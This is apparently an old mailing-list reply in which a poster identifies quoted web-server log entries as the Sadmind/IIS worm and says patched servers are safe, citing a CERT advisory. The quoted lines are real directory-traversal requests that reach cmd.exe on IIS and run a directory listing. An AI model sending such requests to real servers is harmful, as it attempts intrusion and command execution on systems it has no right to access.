>http://www.practicalcomponents.com/scripts/..Ã?¯../winnt/system32/cmd.e >xe?/ >c+dir c: >http://www.practicalcomponents.com/scripts/..À¯../winnt/system32/cmd.exe >?/c+ This looks like the Sadmind/IIS worm: http://www.cert.org/advisories/CA-2001-11.html If it is there's nothing to worry about if your server has recent security patches on it ... it exploits well-known vulnerabilities. -- - Erik Mattheis Weaning self off M$. Learning Linux,. Waiting for OS X apps. (612) 827 3963